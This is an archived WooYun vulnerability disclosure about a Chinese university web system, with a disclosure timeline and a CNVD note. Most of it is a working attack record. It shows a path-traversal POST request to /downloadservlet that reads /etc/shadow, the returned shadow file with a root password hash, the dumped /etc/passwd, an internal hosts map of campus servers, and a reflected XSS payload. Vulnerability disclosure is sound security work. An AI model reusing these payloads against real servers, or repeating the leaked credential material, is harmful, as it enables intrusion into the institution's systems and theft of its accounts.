乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-29: 细节已通知厂商并且等待厂商处理中 2016-01-05: 厂商已经确认,细节仅向厂商公开 2016-01-15: 细节向核心白帽子及相关领域专家公开 2016-01-25: 细节向普通白帽子公开 2016-02-04: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
某大学系统任意文件读取可读取shadow、hosts以及XSS
POST /downloadservlet HTTP/1.1Content-Length: 109Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**:80/Cookie: JSESSIONID=D6FC704FEB41627D751272732AB689CD.kingo; GUEST_LANGUAGE_ID=zh_CN; COOKIE_SUPPORT=trueHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*fileName=&path=../../../../../../../../../../etc/shadow&realPath=/opt/jboss/server/default/./deploy/ROOT.war/
返回
root:$6$ssbWJtO5$k7/rGtoF/u95laY5OHpBzGYPpQdxdvgEwhPBLPl2PqPwUTeLmm3BoZmckEdnHKV1gbK0MpbJXi4ywpPIvN8HQ/:16069:0:99999:7:::bin:*:15513:0:99999:7:::daemon:*:15513:0:99999:7:::adm:*:15513:0:99999:7:::lp:*:15513:0:99999:7:::sync:*:15513:0:99999:7:::shutdown:*:15513:0:99999:7:::halt:*:15513:0:99999:7:::mail:*:15513:0:99999:7:::uucp:*:15513:0:99999:7:::operator:*:15513:0:99999:7:::games:*:15513:0:99999:7:::gopher:*:15513:0:99999:7:::ftp:*:15513:0:99999:7:::nobody:*:15513:0:99999:7:::dbus:!!:15111::::::usbmuxd:!!:15111::::::avahi-autoipd:!!:15111::::::vcsa:!!:15111::::::rpc:!!:15111:0:99999:7:::rtkit:!!:15111::::::abrt:!!:15111::::::apache:!!:15111::::::haldaemon:!!:15111::::::ntp:!!:15111::::::saslauth:!!:15111::::::postfix:!!:15111::::::mysql:!!:15111::::::avahi:!!:15111::::::rpcuser:!!:15111::::::nfsnobody:!!:15111::::::pulse:!!:15111::::::gdm:!!:15111::::::tomcat:!!:15111::::::webalizer:!!:15111::::::sshd:!!:15111::::::tcpdump:!!:15111::::::oprofile:!!:15111::::::ldap:!!:15560::::::jboss:!!:15811:0:99999:7:::nginx:!!:15831::::::www:!!:15831:0:99999:7:::
hosts文件
**.**.**.** localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 #中心数据库 **.**.**.** basedb **.**.**.** #目录服务 **.**.**.** ldap **.**.**.** #信息门户 **.**.**.** info **.**.**.** #**.**.**.** info **.**.**.** #数据交换 **.**.**.** dx **.**.**.** #综合查询 **.**.**.** rpt **.**.**.** #校情展示 **.**.**.** scinfo sc**.**.**.** #办公自动化 **.**.**.** oa **.**.**.** #科技管理 **.**.**.** ts **.**.**.** #校报管理 **.**.**.** xb **.**.**.** #学科管理 **.**.**.** #实践教学 **.**.**.** #教务管理 **.**.**.** ea **.**.**.** #学生管理 **.**.**.** stu **.**.**.** #人力管理 **.**.**.** hr **.**.**.**
XSS
GET /web/guest/1<ScRiPt>prompt(/xss/)</ScRiPt> HTTP/1.1Referer: http://**.**.**.**:80/Cookie: JSESSIONID=D6FC704FEB41627D751272732AB689CD.kingo; GUEST_LANGUAGE_ID=zh_CN; COOKIE_SUPPORT=trueHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologinavahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinrtkit:x:499:496:RealtimeKit:/proc:/sbin/nologinabrt:x:173:173::/etc/abrt:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsaslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:42::/var/lib/gdm:/sbin/nologintomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologinjboss:x:500:501::/home/jboss:/bin/bashnginx:x:496:492:nginx user:/var/cache/nginx:/sbin/nologinwww:x:501:502::/home/www:/bin/bash
权限控制
危害等级:中
漏洞Rank:7
确认时间:2016-01-05 15:45
CNVD确认所述情况,已经转由CNCERT向教育网应急组织通报,由其后续协调网站管理单位处置.
暂无